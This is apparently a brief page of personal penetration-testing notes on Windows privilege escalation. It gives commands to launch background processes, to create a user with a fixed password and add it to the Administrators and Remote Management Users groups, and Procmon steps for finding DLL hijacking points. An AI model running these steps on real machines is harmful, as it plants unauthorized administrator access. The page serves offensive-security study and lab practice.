windows-privilege-escalation
background shell
START /B FILE
Start-Process -NoNewWindow -FilePath FILE -ArgumentList "ARGS" [-Credential $creds]Create User
# add new user
net user kashz iamR00t123! /add
net localgroup administrators kashz /add
net localgroup "Remote Management Users" kashz /addDLL hijacking
NOTE: needs RDP-access
# required library files which could be missing; specified with relative paths; absolute paths which could be writable.
> Run Procmon64.exe; filter to service in question; deselect registry activity and network activity
> net start <service>
# see which DLL files are missing and exploitRunAs | Creds reuse using PS
Decrypt PSCredential
Reference
Last updated
Was this helpful?